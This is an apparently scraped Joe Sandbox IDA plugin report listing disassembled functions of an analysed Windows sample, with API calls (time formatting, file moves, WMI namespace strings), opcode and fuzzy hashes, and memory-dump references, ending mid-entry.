    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: Time_wcslen$System__aulldiv_swprintf$CurrentFileProcess__vswprintf_c_l
    • String ID: %u.%03u
    • API String ID: 2956649372-1114938957
    • Opcode ID: 561cd8efc55381a3f600aa3057e3781deb7b0cffd6d3654e399ad0991b474cf9
    • Instruction ID: 554cad8c60ba24da70bf91f4bc8ca4f139ae3c15c22a3ba13b6709dbee8ab9ec
    • Opcode Fuzzy Hash: 561cd8efc55381a3f600aa3057e3781deb7b0cffd6d3654e399ad0991b474cf9
    • Instruction Fuzzy Hash: 2A217172A083106BD718EB65DC89DAF77ECEBD4710F044929F555D3241DA30EA0897A6
    Function 00CABC1B Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 68timeCOMMON
    Download Yara Rule
    APIs
    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00CABC2F
    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00CABC40
    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CABC4E
    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00CABC5C
    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00CABC77
    • GetTimeFormatW.KERNEL32(00000400,?,?,00000000,?,00000032), ref: 00CABC9E
    • _swprintf.LIBCMT ref: 00CABCC4
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: Time$System$File$Format$DateLocalSpecific_swprintf
    • String ID: %s %s
    • API String ID: 385609497-2939940506
    • Opcode ID: 53848e167914eff363b96768fe56d7183a361cc19ac4a1117e37c853a65c4ee1
    • Instruction ID: 39ab410c706877c1c647d07cb97e7e0eee072c87325800d3517fb438d14b104d
    • Opcode Fuzzy Hash: 53848e167914eff363b96768fe56d7183a361cc19ac4a1117e37c853a65c4ee1
    • Instruction Fuzzy Hash: 3221C4B254115DABDB25DFA0EC48EEF3BACFF59305F144026FA16D2111E720DA4A9B60
    Function 00CB0EC0 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON
    Download Yara Rule
    APIs
    • MultiByteToWideChar.KERNEL32(00000000,00000000,00C9C43F,00C9C441,00000000,00000000,4B9F516E,00000001,00000000,00000000,00C9C32C,?,?,?,00C9C43F,ROOT\CIMV2), ref: 00CB0F49
    • MultiByteToWideChar.KERNEL32(00000000,00000000,00C9C43F,?,00000000,00000000,?,?,?,?,?,00C9C43F), ref: 00CB0FC4
    • SysAllocString.OLEAUT32(00000000), ref: 00CB0FCF
    • _com_issue_error.COMSUPP ref: 00CB0FF8
    • _com_issue_error.COMSUPP ref: 00CB1002
    • GetLastError.KERNEL32(80070057,4B9F516E,00000001,00000000,00000000,00C9C32C,?,?,?,00C9C43F,ROOT\CIMV2), ref: 00CB1007
    • _com_issue_error.COMSUPP ref: 00CB101A
    • GetLastError.KERNEL32(00000000,?,00C9C43F,ROOT\CIMV2), ref: 00CB1030
    • _com_issue_error.COMSUPP ref: 00CB1043
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
    • String ID:
    • API String ID: 1353541977-0
    • Opcode ID: 1713f43bfe9bcf1e58da90b7391a1c6b0fcb80fe0d482433e9313ae8600a7085
    • Instruction ID: fb0b25feafccf52d3e56fa1df8acfa58e267606d206867ad58abec855736b01e
    • Opcode Fuzzy Hash: 1713f43bfe9bcf1e58da90b7391a1c6b0fcb80fe0d482433e9313ae8600a7085
    • Instruction Fuzzy Hash: 8A41E9B1A00245AFDB109FA8DC45FEFBBB8EB48710F244229F915E7240D735E9409BA5
    Function 00CAE8CF Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 184COMMON
    Download Yara Rule
    APIs
    • _wcslen.LIBCMT ref: 00CAE8EE
    • ShowWindow.USER32(?,00000000), ref: 00CAEA5D
    • GetExitCodeProcess.KERNEL32(?,?), ref: 00CAEA99
    • CloseHandle.KERNEL32(?), ref: 00CAEABF
    • ShowWindow.USER32(?,00000001), ref: 00CAEB21
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: ShowWindow$CloseCodeExitHandleProcess_wcslen
    • String ID: .exe$.inf
    • API String ID: 783751319-3750412487
    • Opcode ID: cf2c89a7a6d446355a6a63f6590c0aecec5725767f3daa634c6521e5bff5df9f
    • Instruction ID: 620738557c0b3ed07cf2607c7e49b54c1823320d7690cd3491c3dc96ab14258d
    • Opcode Fuzzy Hash: cf2c89a7a6d446355a6a63f6590c0aecec5725767f3daa634c6521e5bff5df9f
    • Instruction Fuzzy Hash: 2051F4311083829EDB309B25E844BBF7BE5AF82748F08481DF5D597190DB708E85DBA6
    Function 00C9A5E9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON
    Download Yara Rule
    APIs
    • __EH_prolog.LIBCMT ref: 00C9A5EE
    • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00C9A611
    • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00C9A630
      • Part of subcall function 00C9D6A7: _wcslen.LIBCMT ref: 00C9D6AF
      • Part of subcall function 00CA3306: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00013306,00C9D523,00000000,.exe,?,?,00000800,?,?,?,00CA9E4C), ref: 00CA331C
    • _swprintf.LIBCMT ref: 00C9A6CC
      • Part of subcall function 00C94A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C94A33
    • MoveFileW.KERNEL32(?,?), ref: 00C9A73B
    • MoveFileW.KERNEL32(?,?), ref: 00C9A77B
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
    • String ID: rtmp%d
    • API String ID: 3726343395-3303766350
    • Opcode ID: 3051d0bad95eba6d7af4ed12737538dc82b7d135350dbf60b60c72444045cb8c
    • Instruction ID: 9b16721ee32060870be575dd0ef3e3925c18ca0c3eb3cdf326ab34cb057b7dd6
    • Opcode Fuzzy Hash: 3051d0bad95eba6d7af4ed12737538dc82b7d135350dbf60b60c72444045cb8c
    • Instruction Fuzzy Hash: C4415C71900669AACF20ABA0CC99FEF737CBF55344F0404A9B555E3046EB349B85EFA1
    Function 00CA2528 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON
    Download Yara Rule
    APIs
    • __aulldiv.LIBCMT ref: 00CA253E
      • Part of subcall function 00C9C619: GetVersionExW.KERNEL32(?), ref: 00C9C63E
    • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,00000001), ref: 00CA2561
    • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,00000001), ref: 00CA2573
    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00CA2584
    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CA2594
    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CA25A4
    • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00CA25DF
    • __aullrem.LIBCMT ref: 00CA2689
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
    • String ID:
    • API String ID: 1247370737-0
    • Opcode ID: bea8c0b79c1885f55ec49a95229e100efc4a791360e5a8250282b84acf13dfe7
    • Instruction ID: 609b94970c02246663742d25a0c203acc7d7077893c129bcb4a05827d0fc747a
    • Opcode Fuzzy Hash: bea8c0b79c1885f55ec49a95229e100efc4a791360e5a8250282b84acf13dfe7
    • Instruction Fuzzy Hash: 404125B24083069FC714DF69D880A6BBBE9FB88314F04892EF5D682210E734E549DB62
    Function 00CAAD0E Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: _wcslen
    • String ID: </p>$</style>$<br>$<style>$>
    • API String ID: 176396367-3568243669
    • Opcode ID: 53973498175bef3082e72ea859bd0b0a3422a37ba613f496b9d71c0d73d458df
    • Instruction ID: ace9813f2ceaf881fb1585602432c690b8612ea9bc5f863a5e03af90e2ff715c
    • Opcode Fuzzy Hash: 53973498175bef3082e72ea859bd0b0a3422a37ba613f496b9d71c0d73d458df
    • Instruction Fuzzy Hash: 7B515926B41323A1DB305A648811B7673E0DFA7759F68042BFCD08B6C0FB658E81D363
    Function 00CC083D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
    Download Yara Rule
    APIs
    • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00CC0FB2,00000000,00000000,00000000,00000000,00000000,?), ref: 00CC087F
    • __fassign.LIBCMT ref: 00CC08FA
    • __fassign.LIBCMT ref: 00CC0915
    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00CC093B
    • WriteFile.KERNEL32(?,00000000,00000000,00CC0FB2,00000000,?,?,?,?,?,?,?,?,?,00CC0FB2,00000000), ref: 00CC095A
    • WriteFile.KERNEL32(?,00000000,00000001,00CC0FB2,00000000,?,?,?,?,?,?,?,?,?,00CC0FB2,00000000), ref: 00CC0993
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
    • String ID:
    • API String ID: 1324828854-0
    • Opcode ID: 43552f066ee92765e31a5a50d69c329fb97ef8da684101cbafd21c98a0000244
    • Instruction ID: c6c46c310d41ba550afb1a7fd9511e624a7dfcba7d2a39430847ca1a67cf1771
    • Opcode Fuzzy Hash: 43552f066ee92765e31a5a50d69c329fb97ef8da684101cbafd21c98a0000244
    • Instruction Fuzzy Hash: 89517F71A00249DFDB14CFA8D885FEEBBB8EF09311F24415AE955E7292E7309A41CB61
    Function 00CB3A80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
    Download Yara Rule
    APIs
    • _ValidateLocalCookies.LIBCMT ref: 00CB3AB7
    • ___except_validate_context_record.LIBVCRUNTIME ref: 00CB3ABF
    • _ValidateLocalCookies.LIBCMT ref: 00CB3B48
    • __IsNonwritableInCurrentImage.LIBCMT ref: 00CB3B73
    • _ValidateLocalCookies.LIBCMT ref: 00CB3BC8
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
    • String ID: csm
    • API String ID: 1170836740-1018135373
    • Opcode ID: b3379af1ebb0a785a34a7a1420822c442503f9c91c200bf1ab19857bfd50340a
    • Instruction ID: 9421a8ce7e5a4b7a7265e30bc9ed9dd048e6ddbbdedffb539f10b60b89a76647
    • Opcode Fuzzy Hash: b3379af1ebb0a785a34a7a1420822c442503f9c91c200bf1ab19857bfd50340a
    • Instruction Fuzzy Hash: 1341C134A00248AFCF14DF69C885ADEBFB5EF44314F148165E828AB396D731AF05DB90
    Function 00CAA965 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: _wcslen
    • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
    • API String ID: 176396367-3743748572
    • Opcode ID: 9badb7c0ab0a3fa9048b436486c3113ed0b671b729fee8bd695416aa87728ad4
    • Instruction ID: a4b86270c8245a6bb7724e0ecc110a7fee32b0b2d9eec948af1967205186bc89
    • Opcode Fuzzy Hash: 9badb7c0ab0a3fa9048b436486c3113ed0b671b729fee8bd695416aa87728ad4
    • Instruction Fuzzy Hash: 59314022644303AAD634AB54DC42BB773E4EB91324F60842EF865572C1FB60AE84D7A3
    Function 00CBDA54 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
    Download Yara Rule
    APIs
      • Part of subcall function 00CBDA18: _free.LIBCMT ref: 00CBDA41
    • _free.LIBCMT ref: 00CBDAA2
      • Part of subcall function 00CBA65A: RtlFreeHeap.NTDLL(00000000,00000000,?,00CBDA46,00CC4ADC,00000000,00CC4ADC,00000000,?,00CBDA6D,00CC4ADC,00000007,00CC4ADC,?,00CBDE6A,00CC4ADC), ref: 00CBA670
      • Part of subcall function 00CBA65A: GetLastError.KERNEL32(00CC4ADC,?,00CBDA46,00CC4ADC,00000000,00CC4ADC,00000000,?,00CBDA6D,00CC4ADC,00000007,00CC4ADC,?,00CBDE6A,00CC4ADC,00CC4ADC), ref: 00CBA682
    • _free.LIBCMT ref: 00CBDAAD
    • _free.LIBCMT ref: 00CBDAB8
    • _free.LIBCMT ref: 00CBDB0C
    • _free.LIBCMT ref: 00CBDB17
    • _free.LIBCMT ref: 00CBDB22
    • _free.LIBCMT ref: 00CBDB2D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: ed90a822092467ab948ce4ab8a4e5ff1fef504289117e408d2aed02f462530fb
    • Instruction ID: 18c610adcb248ec77423d76954856bc069534991daa861a460b2630cdd91351e
    • Opcode Fuzzy Hash: ed90a822092467ab948ce4ab8a4e5ff1fef504289117e408d2aed02f462530fb
    • Instruction Fuzzy Hash: E5113371984B08BAD624BBB0CC0BFCBB79C6F15700F444C16B29BB6052EA75B9057791
    Function 00CAF76A Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00CAF7E5,00CAF748,00CAF9E9), ref: 00CAF781
    • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00CAF797
    • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00CAF7AC
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AddressProc$HandleModule
    • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
    • API String ID: 667068680-1718035505
    • Opcode ID: 208bdb8bc7c0b63f3c934fde0c1ed134f7778cb334278fc7bbf069acc04d011e
    • Instruction ID: a9aa0293009afeba4ed342d60ded8e4ededa171c69f8c38c0650c243e5a43bc2
    • Opcode Fuzzy Hash: 208bdb8bc7c0b63f3c934fde0c1ed134f7778cb334278fc7bbf069acc04d011e
    • Instruction Fuzzy Hash: A0F096317512636BAB219FF49DD5F7A22DC9A07359325043DEA21D3640E670CE439BF1
    Function 00CA2789 Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON
    Download Yara Rule
    APIs
    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CA27E1
      • Part of subcall function 00C9C619: GetVersionExW.KERNEL32(?), ref: 00C9C63E
    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00CA2805
    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00CA281F
    • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00CA2832
    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CA2842
    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CA2852
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: Time$File$System$Local$SpecificVersion
    • String ID:
    • API String ID: 2092733347-0
    • Opcode ID: d898cf29ba94881aa82a19a948e2ee280aa92909ca2a2ec7d2c420e8e2c822e7
    • Instruction ID: 3bdc7400bb1a0b89a44a2b1548f5e62718be3ea9ee64d726c04767d231e57397
    • Opcode Fuzzy Hash: d898cf29ba94881aa82a19a948e2ee280aa92909ca2a2ec7d2c420e8e2c822e7
    • Instruction Fuzzy Hash: A8310676108316AFC704DFA8D884A9FB7E8BF98744F048A1EF995C3210E730D549CBA6
    Function 00CB3C7A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • GetLastError.KERNEL32(?,?,00CB3C71,00CB3A2C,00CB0BE4), ref: 00CB3C88
    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00CB3C96
    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00CB3CAF
    • SetLastError.KERNEL32(00000000,00CB3C71,00CB3A2C,00CB0BE4), ref: 00CB3D01
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: ErrorLastValue___vcrt_
    • String ID:
    • API String ID: 3852720340-0
    • Opcode ID: 9622a55646f8bdf071fe8ee9a068ef9dad19c925f9631871bec1ad05a6335fce
    • Instruction ID: e21bb29d0a4398435a488e26928fb0d50314cf8eaa7e2d7d11a2bc4875ea306c
    • Opcode Fuzzy Hash: 9622a55646f8bdf071fe8ee9a068ef9dad19c925f9631871bec1ad05a6335fce
    • Instruction Fuzzy Hash: E801D83220E351AE9A1827BD7C95BEF6F88EB01772F30032AF530A50E1EF115E00A594
    Function 00CBA505 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • GetLastError.KERNEL32(?,00CD3070,00CB5972,00CD3070,?,?,00CB5271,00000050,?,00CD3070,00000200), ref: 00CBA509
    • _free.LIBCMT ref: 00CBA53C
    • _free.LIBCMT ref: 00CBA564
